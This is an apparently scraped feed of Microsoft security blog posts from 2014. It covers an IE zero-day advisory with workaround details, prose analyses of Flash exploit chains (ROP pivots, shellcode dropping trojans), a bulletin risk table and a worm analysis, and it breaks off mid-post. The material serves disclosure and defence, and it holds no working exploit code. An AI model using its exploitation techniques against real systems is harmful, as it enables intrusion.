bgcolor="green">Not vulnerable</td> <td bgcolor="green">Not vulnerable</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td>n/a</td> </tr> <tr> <td>Internet Explorer 9</td> <td>n/a</td> <td bgcolor="yellow">Vulnerable,<br />not under attack</td> <td bgcolor="yellow">Vulnerable,<br />not under attack</td> <td>n/a</td> <td>n/a</td> </tr> <tr> <td>Internet Explorer 10</td> <td>n/a</td> <td>n/a</td> <td bgcolor="red">Under attack</td> <td bgcolor="red">Under attack</td> <td>n/a</td> </tr> <tr> <td>Internet Explorer 11</td> <td>n/a</td> <td>n/a</td> <td bgcolor="green">Not vulnerable</td> <td>n/a</td> <td bgcolor="green">Not vulnerable</td> </tr> </tbody> </table> <p><b>Steps you can take to stay safe</b></p> <p>Any of the following three protection mechanisms will protect you from exploits we have seen that leverage this vulnerability for code execution:</p> <p>1 &ndash; <a href="http://windows.microsoft.com/en-us/internet-explorer/download-ie-MCM">Upgrade to Internet Explorer 11</a></p> <p>2 &ndash; Install the <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138">Enhanced Mitigation Experience Toolkit (EMET)</a></p> <p>3 &ndash; Install the <a href="http://support.microsoft.com/kb/2934088">Fix it workaround tool</a></p> <p>Upgrading to Internet Explorer 11 is the best way to stay safe from exploit attempts targeting this vulnerability.</p> <p>The <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138">Enhanced Mitigation Experience Toolkit (EMET)</a> is also an effective way to block the targeted attacks we have analyzed. This particular exploit explicitly checks for EMET and refuses to run on any system where EMET is installed. However, even with the exploit&rsquo;s EMET check removed, the default configuration of EMET blocks the attack. In this particular case, EMET&rsquo;s EAF and Anti-Detour features block the exploit in the default EMET configuration. With EMET&rsquo;s &ldquo;Deep Hooks&rdquo; feature enabled, the MemProt, StackPivot, and CallerCheck features each independently are capable of blocking this exploit. We are pleased to see EMET continuing to provide protection for a significant portion of memory corruption exploits today. On that note, we found that in the second half of 2013, all in-the-wild exploits that we encountered that have&nbsp;leveraging memory corruption for code execution were blocked by EMET! We recommend that all customers install this tool. Watch next week for an announcement at the RSA Conference about the future of EMET.</p> <p>The third, and likely easiest way to protect yourself from attempts to exploit the vulnerability, is to install the Fix it workaround tool released in <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">today&rsquo;s advisory</a>. You can refer to <a href="http://support.microsoft.com/kb/2934088">Knowledge Base Article 2934088</a> for complete details but simply clicking through the &ldquo;Fix It&rdquo; installer from the following link will protect your system from attempts to exploit the vulnerability:</p> <div align="center"> <table style="width:75%;" border="1" cellpadding="0"> <tbody> <tr> <td> <p align="center"><strong>Apply Fix it</strong></p> </td> <td> <p align="center"><strong>Uninstall Fix it</strong></p> </td> </tr> <tr> <td> <p align="center"><a href="http://go.microsoft.com/?linkid=9844137"><img title="Microsoft Fix it 50994" style="border:0px currentColor;" alt="Microsoft Fix it 50994" src="http://blogs.technet.com/resized-image.ashx/__size/142x54/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0574.fixit.png" /></a><br />&nbsp; <a href="http://go.microsoft.com/?linkid=9844137">Enable the CVE-2014-0322 Workaround</a></p> </td> <td> <p align="center"><a href="http://go.microsoft.com/?linkid=9844138"><img title="Microsoft Fix it 50995" style="border:0px currentColor;" alt="Microsoft Fix it 50995" src="http://blogs.technet.com/resized-image.ashx/__size/142x54/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0574.fixit.png" /></a><br />&nbsp; <a href="http://go.microsoft.com/?linkid=9844138">Uninstall the CVE-2014-0322 Workaround</a></p> </td> </tr> </tbody> </table> </div> <p>Installing the Fix it does not require a reboot but administrative privileges on the system are required. The Fix it installation will be effective on any Internet Explorer 9 or Internet Explorer 10 system where the most recently-released security update (MS14-010) has already been installed. More specifically, the appcompat shim is enabled for the Internet Explorer process where mshtml.dll is one of the following four versions: 9.0.8112.16533, 9.0.8112.20644, 10.0.9200.16798, or 10.0.9200.20916. The eventual security update that addresses this vulnerability will ship with an incremented mshtml.dll version number, thereby automatically obsoleting this Fix it.</p> <p>You can read more about previous instances of this temporary workaround technique at <a href="http://blogs.technet.com/b/srd/archive/tags/fixit">http://blogs.technet.com/b/srd/archive/tags/fixit</a>/. Fix its have been a popular mitigation technique with our customers to cover the gap between the time when an exploit appears and the time when a final, comprehensive, fully-tested security update is available for wide distribution. The last instance of a Fix It tool to address an Internet Explorer vulnerability (addressed by MS13-080) was installed on 23 million computers. The most recent security-related Fix it solution mitigated an Office vulnerability that was subsequently addressed by MS13-096. That Fix It solution was installed on 57 million computers. We mention these numbers with the hope of giving you confidence that a number of your IT Pro peers are using Fix it solutions to protect their enterprise network.</p> <p><b>More details about the vulnerability and exploit</b></p> <p>CVE-2014-0322 describes an mshtml.dll use-after-free vulnerability involving the CMarkup object being accessed after it has been freed. As described above, this vulnerability is present in both Internet Explorer 9 and Internet Explorer 10 but exploits we have seen target only 32-bit Internet Explorer 10. The exploit was explained in greater detail on the <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">FireEye security blog</a>. To recap, it uses Javascript to trigger the use-after-free condition and then uses Flash to convert a write primitive into a read/write primitive that enables DEP and ASLR to be bypassed. The primitive conversion happens by redirecting a write based on a freed object&rsquo;s data (which has now been reallocated by the attacker) to corrupt a size field inside a Flash object. The corrupted size field in the Flash object is used to read and write outside of the object&rsquo;s boundary, allowing discovery of module addresses in Internet Explorer&rsquo;s Address Space. We are not aware of any elevation of privilege or sandbox escape vulnerability being used to &ldquo;break out&rdquo; of the Internet Explorer Protected Mode sandbox. Therefore, even after the exploit gains code execution, it still needs a non-trivial element to result in a persistent compromise of the computer.</p> <p><b>More details about the Fix it tool</b></p> <p>The Fix it redirects execution of two functions, mshtml!CMarkup::InsertElementInternal and mshtml!CMarkup::InsertTextInternal, to the code introduced by the appcompat shim. Similar changes are made in both functions. Let&rsquo;s take a closer look at mshtml!CMarkup::InsertElementInternal:</p> <pre>0:020&gt; u mshtml!Cmarkup::InsertElementInternal MSHTML!CMarkup::InsertElementInternal: e9d3d2a500 jmp MSHTML!SZ_HTMLNAMESPACE+0xf (66bb43c7) // we redirect execution 0:020&gt; u 66bb43c7 MSHTML!SZ_HTMLNAMESPACE+0xf: 60 pushad //save registers 8bc8 mov ecx,eax //move the this* pointer to ecx e818468bff call MSHTML!CMarkup::CLock::CLock+0x2 (664689e7) //call into the code where we AddRef() on this CMarkup object 61 popad //restore our registers 55 push ebp //execute the code we overwrote in the jump to this shim 8bec mov ebp,esp e91c2d5aff jmp MSHTML!CMarkup::InsertElementInternal+0x5 (661570f4) //jump back to the next instruction after the our redirection point </pre> <p>Similar to the <a href="http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx">Fix it solution for CVE-2013-3893</a>, the shim leverages slack space near the end of the mshtml.dll&rsquo;s .text section. Astute readers may notice that the appcompat shim does not introduce any code to reduce the reference count on the CMarkup object. Said another way, the appcompat shim introduces a memory leak.&nbsp; The memory is restored when an IE tab (process) is terminated. This minor side effect of the workaround tool is harmless and of course it won&rsquo;t be present in the final comprehensive security update for this vulnerability.</p> <p><b>Acknowledgements</b></p> <p>Thanks to Richard Van Eeden, Axel Souchet, Chengyun Chu, and Elia Florio for the help triaging this vulnerability and help building the Fix it workaround tool.</p> <p><b>Conclusion</b></p> <p>Please let us know if you have any questions about the risk posed by this vulnerability, the exploits we have seen leveraging the vulnerability for code execution, or mitigation opportunities available to protect your systems. You can email us at <a href="mailto:secure@microsoft.com">secure@microsoft.com</a> with [SRD] in subject line. Or if you plan to attend the RSA Conference in San Francisco, CA next week, feel free to stop by the Microsoft Booth #3005 to talk to us in person. We&rsquo;re looking forward to announcing EMET news on Tuesday morning.</p> <p>- Neil Sikka, MSRC Engineering (@neilsikka)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3623299&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">0dayfixitRisk AsessmentAttackEMET A journey to CVE-2014-0497 exploithttp://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspxMon, 17 Feb 2014 22:50:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:9404970b-c529-4e5b-8289-2682168db73emsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx#comments<div class="ExternalClass81D09C22098A4D24B9D1D7BFD3CC23DF"> <p>​Last week we published a <a href="http://blogs.technet.com/b/mmpc/archive/2014/02/10/a-journey-to-cve-2013-5330-exploit.aspx">blog post about a CVE-2013-5330 exploit</a>. We&rsquo;ve also recently seen a new, similar attack targeting a patched Adobe Flash Player vulnerability (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0497">CVE-2014-0497</a>).</p> <p>The vulnerability related to this malware was addressed with a <a href="http://helpx.adobe.com/security/products/flash-player/apsb14-04.html">patch released by Adobe on February 4, 2014</a>.&nbsp;Flash Player versions 12.0.0.43 and earlier&nbsp;are vulnerable. We analyzed how these attacks work and found the following details.</p> <p>The malicious file has been distributed as a .swf file, which contains:</p> <ul> <li>The vulnerability trigger</li> <li>Shellcode</li> <li>A PE file (encrypted)</li> </ul> <p>The .swf file can be hosted on a web server and run when the webpage is visited. When the .swf is loaded, the vulnerability is triggered.</p> <p>The .swf successfully bypasses the validation of memory range and is able to access an arbitrary location.&nbsp; It overwrites a pointer in a VTABLE to successfully pass control to a controlled location (Note that the exploit does not rely on heap spray &ndash; see figure 1). The controlled location starts with stack pivot ROP gadgets built from a Flash Player DLL. The ROP gadgets call VirtualProtect() to make the shellcode memory region executable. Finally, the control is passed to the shellcode via a jmp esp instruction (as shown in figure 3).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV1.png"><img style="height:45px;width:500px;" alt="Control transfer" src="http://www.microsoft.com/security/portal/blog-images/a/CV1.png" border="0" /></a></p> <p><em>Figure 1: Control transfer via an overwritten pointer in VTABLE</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV2.png"><img alt="ROP gadgets" src="http://www.microsoft.com/security/portal/blog-images/a/CV2.png" border="0" /></a></p> <p><em>Figure 2: Stack pivot ROP gadgets</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV3.png"><img style="height:233px;width:500px;" alt="Control is passed to shellcode" src="http://www.microsoft.com/security/portal/blog-images/a/CV3.png" border="0" /></a></p> <p><em>Figure 3: Control is passed to shellcode via &ldquo;jmp esp&rdquo;</em></p> <p>The shellcode simply drops a PE File (already decrypted by .swf) as %temp%\a.exe and executes it. The dropped PE file (Sha1: 265fdeb993a09d2350daa130de4ce5b662bed628) is detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:Win32/Siromost.A">TrojanDownloader:Win32/Siromost.A</a>.</p> <p>The telemetry of this exploit is shown in figure 4.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CV4.png"><img alt="Daily reports for CVE-2014-0497" src="http://www.microsoft.com/security/portal/blog-images/a/CV4.png" border="0" /></a></p> <p><em>Figure 4: Daily reports for CVE-2014-0497</em></p> <p>We have confirmed this exploit works across multiple Flash Player versions. In our lab testing, we are able to reproduce the attack on the following Adobe Flash Player versions:</p> <ul> <li>11.6.602.171</li> <li>11.6.602.180</li> <li>11.7.700.169</li> <li>11.7.700.202</li> <li>11.7.700.224</li> <li>11.8.800.94</li> <li>11.8.800.168</li> <li>11.8.800.175</li> <li>11.9.900.117</li> <li>11.9.900.152</li> <li>11.9.900.170</li> </ul> <p>Version 12.x (12.0.0.43 and earlier) is known to contain the vulnerability used by the attack, but it also carries a mitigation that prevents building the ROP gadget from the Flash Player DLL. The sample we analyzed does not support version 12.x for this reason.</p> <p>If you&#39;re using Flash Player version 12.0.0.43 or earlier, you need to update your Flash Player now to be protected against these attacks.</p> <p>You can also find more information about this vulnerability, including workarounds, in <a href="http://technet.microsoft.com/en-us/security/advisory/2755801">Microsoft Security Advisory (2755801)</a>.</p> <p><em>Chun Feng</em><br /><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3623093&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Assessing risk for the February 2014 security updates http://blogs.technet.com/b/srd/archive/2014/02/11/assessing-risk-for-the-february-2014-security-updates.aspxTue, 11 Feb 2014 18:05:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:fa3c4055-c4c4-4848-be51-8326d442252fSRD Blog Author0<p>Today we released seven security bulletins addressing 31 unique CVE&rsquo;s. Four bulletins have a maximum severity rating of Critical while the other three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max Exploit-ability</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-010">MS14-010</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses both memory corruption vulnerabilities and elevation of privilege vulnerabilities in a single package.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-011">MS14-011</a> <p>(VBScript)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>The single CVE addressed by this bulletin is included in MS14-010 for IE9 users. Customers with IE9 installed need not deploy MS14-011.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-007">MS14-007</a> <p>(DirectWrite)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Internet Explorer is vector to this vulnerability in&nbsp;DirectWrite.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-005">MS14-005</a> <p>(MSXML)</p> </td> <td>Victim browses to a malicious website to be exposed to this information leak vulnerability.</td> <td>Important</td> <td>3</td> <td>Vulnerability first seen as ASLR bypass mechanism in targeted attacks during November 2013. May see attacks again begin using this again as details emerge.</td> <td>As discussed in the <a href="http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspx">SRD </a>and <a href="http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html">FireEye </a>blogs during November 2013, this vulnerability was used along with another vulnerability in active attacks. The MS13-090 security update completely blocked all attacks described by those blog posts.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-009">MS14-009</a> <p>(.NET Framework)</p> </td> <td>Most likely to be exploited vulnerability involves attacker initiating but not completing POST requests to ASP.NET web application, resulting in resource exhaustion denial of service.</td> <td>Important</td> <td>1</td> <td>Resource exhaustion attacks involving CVE-2014-0253 already in progress in the wild.</td> <td>CVE-2014-0253 addresses resource exhaustion &ldquo;<a href="http://en.wikipedia.org/wiki/Slowloris">Slowloris</a>&rdquo; attack. <p>CVE-2014-0257 addresses sandbox escape vulnerability invoving com objects running code out-of-process.</p> <p>CVE-2014-0295 addresses the vsab7rt.dll ASLR bypass described at<a href="http://www.greyhathacker.net/?p=585"> http://www.greyhathacker.net/?p=585</a>.</p> </td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-008">MS14-008</a> <p>(Forefront Protection for Exchange)</p> </td> <td>Code is unlikely to be reachable. However, if attackers do find a way, it would involve a malicious email message being processed by the Forefront Protection for Exchange service.</td> <td>Critical</td> <td>2</td> <td>Unlikely to see exploits developed targeting this vulnerability.</td> <td>While this vulnerability&rsquo;s attack vector appears attractive (email), the vulnerability is unlikely to be reachable. It was discovered internally by code analysis and we have not been successful in developing a real-world vulnerability trigger. We address it via security update out of an abundance of caution.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/security/bulletin/MS14-006">MS14-006</a> <p>(IPv6)</p> </td> <td>Attacker on the same subnet as victim (IPv6 link-local) sends large number of malicious router advertisements resulting in victim system bugcheck.</td> <td>Important</td> <td>3</td> <td>Denial of service only.</td> <td>This bugcheck is triggered by a watchdog timer on the system, not due to memory corruption. Affects Windows RT, Windows Server 2012 (not R2), and Windows 8 (not 8.1).</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3622632&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Attack VectorRisk Asessment MSRT February 2014 - Jenxcushttp://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenxcus.aspxTue, 11 Feb 2014 17:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e130694d-5d2f-4868-abf0-0008001e6074msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenxcus.aspx#comments<p>​We have been seeing a lot more VBScript malware in recent months, thanks in most part to <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Worm:VBS/Jenxcus#tab=1">VBS/Jenxcus</a>. Jenxcus is a worm coded in VBScript that is capable of propagating via removable drives. Its payload opens a backdoor on an infected machine, allowing it to be controlled by a remote attacker. For the past few months we have seen the number of affected machines remain constantly high. For this reason we have included Jenxcus in the February release of the Microsoft <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool </a>(MSRT).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen1.png"><img style="height:272px;width:500px;" alt="Jenxcus machine infections" src="http://www.microsoft.com/security/portal/blog-images/a/Jen1.png" border="0" /></a></p> <p><em>Figure 1: Jenxcus machine infections October 2013 &ndash; January 2014</em></p> <p>Although Jenxcus is not a very complex malware, it seems to be successful in taking advantage of social engineering attacks - where the malicious script file is commonly bundled with other programs. When the program bundle is executed Jenxcus runs silently in the background. We have seen these bundled programs hosted in certain websites and also seeded in some torrent files.</p> <p>Figure 2 shows an example of a spoofed YouTube site (take note that this is a fake YouTube site) that can be used to attack users of social media services such as Facebook and Twitter by luring them to watch a video. When attempting to play the video, the site serves a fake Flash Player update which is bundled with Jenxcus.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen2.png"><img style="height:355px;width:500px;" alt="Jenxcus is bundled with a fake Flash Player" src="http://www.microsoft.com/security/portal/blog-images/a/Jen2.png" border="0" /></a></p> <p><em>Figure 2: Jenxcus is bundled with a fake Flash Player update on a fake video hosting site </em></p> <p>Another reason why Jenxcus is affecting a large number of machines is due to its worm capability which propagates via removable drives. If a removable drive is found on the infected machine, most Jenxcus variants create a shortcut&nbsp;that uses the same name as personal files found in the drive. The shortcut points to a copy of the malware, and thus users can be caught off-guard by thinking&nbsp;the shortcut link points to&nbsp;a trusted clean file. As shown in Figure 3, when the shortcut link is run it will silently execute <em>Servieca.vbs </em>in the background while also playing <em>my song.mp3 </em>to avoid any suspicion from the user.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen3.png"><img alt="the shortcut link also runs Servieca.vbs" src="http://www.microsoft.com/security/portal/blog-images/a/Jen3.png" border="0" /></a></p> <p><em>Figure 3: When the shortcut link is run it will also silently execute Servieca.vbs</em></p> <p>Jenxcus also has backdoor capabilities - it connects to a host which provides it with commands to execute. The host is usually hardcoded into the worm. Most of the host sites are leveraging <em>no-ip.org</em> to avoid being easily traced.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen4.png"><img alt="the shortcut link also runs Servieca.vbs" src="http://www.microsoft.com/security/portal/blog-images/a/Jen4.png" border="0" /></a></p> <p><em>Figure 4:&nbsp; Jenxcus uses no-ip.org as its host</em></p> <p>The latest variants of Jenxcus are now typically obfuscated to evade easy detection. Figure 5 shows an example of how an obfuscated Jenxcus variant looks.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Jen5.png"><img style="height:225px;width:500px;" alt="Obfuscated Jenxcus variant" src="http://www.microsoft.com/security/portal/blog-images/a/Jen5.png" border="0" /></a></p> <p><em>Figure 5: An obfuscated Jenxcus variant</em></p> <p>In this particular example, the obfuscator inserted a combination of a random set of garbage numbers and characters in between the code. Removing this would leave decimal values that, when converted to ASCII characters, would reveal the original code.</p> <p>Given the tricks and evasion techniques employed by Jenxcus, we recommend you run up-to-date, real-time antimalware software and enable scanning on removable drives.</p> <p>Being vigilant with your clicks and downloads will also help prevent Jenxcus and other threats from getting inside your system.</p> <p><em>Francis Allan Tan Seng and Ferdinand Plazo</em><br /><em>MMPC</em></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3622581&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> A journey to CVE-2013-5330 exploithttp://blogs.technet.com/b/mmpc/archive/2014/02/10/a-journey-to-cve-2013-5330-exploit.aspxMon, 10 Feb 2014 22:40:05 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e8178ed9-cf7d-45f8-9740-fed177703843msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/02/10/a-journey-to-cve-2013-5330-exploit.aspx#comments<p>​Recently, we&#39;ve seen a few attacks in the wild targeting a patched Adobe Flash Player vulnerability (<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5330">CVE-2013-5330</a>). This vulnerability was addressed with a <a href="https://www.adobe.com/au/support/security/bulletins/apsb13-26.html">patch released by Adobe </a>on November 12, 2013. On the Windows platform, Flash Player version 11.9.900.117 and earlier, are vulnerable.</p> <p>We had a chance to analyze how the attacks work and noted some interesting details from our investigation.</p> <p>The malicious file has been distributed as a .swf file using obfuscator secureSWF, which has been designed as a &ldquo;one-stop&rdquo; attack. It contains the vulnerability&rsquo;s trigger, the heap spray and shellcode, and an encrypted PE file (see figure 1).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE1.png"><img alt="malicious .swf file" src="http://www.microsoft.com/security/portal/blog-images/a/CVE1.png" border="0" /></a></p> <p><em>Figure 1: The malicious .swf file</em></p> <p>This .swf exploit can be hosted on a web server and run when the webpage is visited. When the .swf is loaded, the vulnerability is triggered. The .swf successfully bypasses the validation of memory range and is able to access arbitrary locations. It builds a deliberated crafted VTABLE (figure 2) and uses it to pass control to a controlled location, which contains the &ldquo;Shim&rdquo; code (a small piece of code before the shellcode is executed), as shown in figure 3.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE2.png"><img style="height:263px;width:500px;" alt="Crafted VTABLE" src="http://www.microsoft.com/security/portal/blog-images/a/CVE2.png" border="0" /></a></p> <p><em>Figure 2: Crafted VTABLE for control transfer</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE3.png"><img style="height:223px;width:500px;" alt="Shim code" src="http://www.microsoft.com/security/portal/blog-images/a/CVE3.png" border="0" /></a></p> <p><em>Figure 3: The &quot;Shim&rdquo; code</em></p> <p>The &ldquo;Shim&rdquo; code calls VirtualProtect() to make the shellcode memory area writable and executable. After the VirtualProtect() call, the control is passed to the shellcode. The shellcode is short and pithy &ndash; only 140 bytes (see figure 4).</p> <p>Interestingly, the shellcode doesn&rsquo;t contain the code to resolve the API addresses. Instead, the API addresses are resolved by the ActionScript (see figure 5 - the placeholders for the API addresses are marked as red).</p> <p>The shellcode simply drops a PE file (already decrypted by .swf) to the %temp% directory and loads it with LoadLibrary() call. The dropped PE file (SHA1: 05446C67FF8C0BAFFA969FC5CC4DD62EDCAD46F5) is detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanSpy:Win32/Lurk">TrojanSpy:Win32/Lurk</a>. The telemetry for this file is showm in figure 6.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE4.png"><img style="height:297px;width:500px;" alt="&ldquo;shellcode&rdquo;" src="http://www.microsoft.com/security/portal/blog-images/a/CVE4.png" border="0" /></a></p> <p><em>Figure 4: Short and sweet &ldquo;shellcode&rdquo; </em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE5.png"><img alt="ActionScript" src="http://www.microsoft.com/security/portal/blog-images/a/CVE5.png" border="0" /></a></p> <p><em>Figure 5: The ActionScript used to generate the shellcode</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CVE6.png"><img style="height:303px;width:500px;" alt="TrojanSpy:Win32/Lurk infections" src="http://www.microsoft.com/security/portal/blog-images/a/CVE6.png" border="0" /></a></p> <p><em>Figure 6: TrojanSpy:Win32/Lurk infected machines</em></p> <p>We have received reports that an iframe loading this malicious .swf file has been injected to some clean or benign websites. Visiting these websites with an outdated version of Flash Player, can lead to a compromise of the machine.</p> <p>If you&#39;re using Flash Player version 11.9.900.117 or earlier, you need to update your Flash Player now to be protected against these attacks.</p> <p><em>Chun Feng </em><br /><em>MMPC</em></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3622579&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Coordinated malware eradicationhttp://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspxTue, 28 Jan 2014 07:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:856f599c-7531-4f88-b32b-5dc880a0e891msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx#comments<div class="ExternalClass0D182C4AD1BA4CB28EB2D34D6A3DF12E"> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">Today, as an industry, we are very effective at disrupting malware families, but those disruptions rarely eradicate them. Instead, the malware families linger on, rearing up again and again to wreak havoc on our customers.&nbsp;</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">To change the game, we need to change the way we work.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">It is counterproductive when you think about it. The antimalware ecosystem encompasses many strong groups: security vendors, service providers, CERTs, anti-fraud departments, and law enforcement. Each group uses their own strengths and methods to protect their customers and constituents. Each group is able to claim victory from their efforts, but the malware families retain a significant advantage. No matter how big, the reach of each antimalware ecosystem player only extends so far. As a result, our adversaries only need to shift just a bit beyond that reach to get back in business. For example, let&rsquo;s assume an advertising network identifies and shuts down a click-fraud attack.&nbsp; This is great for the network and its advertisers, but the bad guys need only to pivot and attack another advertising network to remain in business. And this time, maybe the bad guys are more effective, because now they&rsquo;re more educated about the need for resiliency and continuity.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">By not working together, we have yielded our advantage to the malware authors. They can see the reach of our tools, and they can dance away from each of us. While we are disrupting them, we are also making them more resilient and more efficient.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">If we want to fight effectively and protect our customers and constituents, we need to eradicate the malware families. To do this, we must coordinate our collective scope and reach so that the bad guys have no room to dance away. Of course, some coordination already exists within the industry today. Antimalware vendors exchange malware samples, prevalence information, and even clean file metadata. They participate with CERTs, ISPs, and law enforcement in sinkholes and takedowns. But it hasn&rsquo;t been enough: a quick glance at the age of the detections that we&rsquo;re still using to find our top malware families shows that we are not&nbsp;eradicating them.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA"><a href="http://www.microsoft.com/security/portal/blog-images/a/Group1a.png"><img class="ms-rtePosition-4" style="height:491px;width:600px;" alt="Graph of malware encounters" src="http://www.microsoft.com/security/portal/blog-images/a/Group1a.png" border="0" /></a></p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA"><em>Figure 1: Malware encounters on Microsoft real-time protection products September 1, 2013 - January&nbsp;25, 2014</em></p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">Getting to a more&nbsp;coordinated eradication effort for each malware family will require much&nbsp;stronger industry partnerships. It also needs new partnerships with financial institutions, payment networks, large internet services, and software bundlers. Each partnership will increase our collective ability to present a unified front, thereby reducing the bad guys&rsquo; ability to evade and profit.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">Tighter coordination is a natural evolution of the malware protection industry, and it is already beginning. For example, when Microsoft teamed up with Europol&rsquo;s European Cybercrime Centre (EC3), the Federal Bureau of Investigation (FBI), a number of ISPs and A10 Networks against the Sirefef/ZeroAccess botnet, the results went far beyond a few days of disruption.&nbsp; Faced with a broadly coordinated action against their IP addresses, Sirefef authors waved the white flag. They are not quite eradicated, but they&rsquo;re certainly heading that way.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">While these efforts are working against malware authors, they are essentially one-offs. We have hundreds of active malware families that require eradication, and we need a repeatable model that will scale.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">We have&nbsp;talked about <a href="http://www.microsoft.com/security/portal/mmpc/shared/protection.aspx">the scope of Microsoft&rsquo;s customer-focused approach</a>, and how we are sharing malware telemetry information. We want to take it much further.&nbsp;We need to create a structure that makes it easy to coordinate campaigns and share more types of information across the entire antimalware ecosystem.</p> <p class="ExternalClass41FA3300299B487FB25C66B049327DFA">The time has come to do this now. We need committed antimalware ecosystem partners to join together in coordinated campaigns to eradicate malware families. Here are some examples of how partners can help with their tools, reach, and scope:</p> <div class="ExternalClass41FA3300299B487FB25C66B049327DFA"> <ul> <li><strong>Security vendors:</strong> By sharing detection methods, malware behavior, and unpacking techniques, vendors can more quickly identity and block the malware families as they appear on network-connected endpoints and servers.</li> <li><strong>Financial institutions, online search, and advertising businesses:</strong> With better fraudulent behavior identification, these organizations can starve malware authors of their ill-gotten gains.</li> <li><strong>CERTs and ISPs:</strong> Armed with vetted lists, CERTS 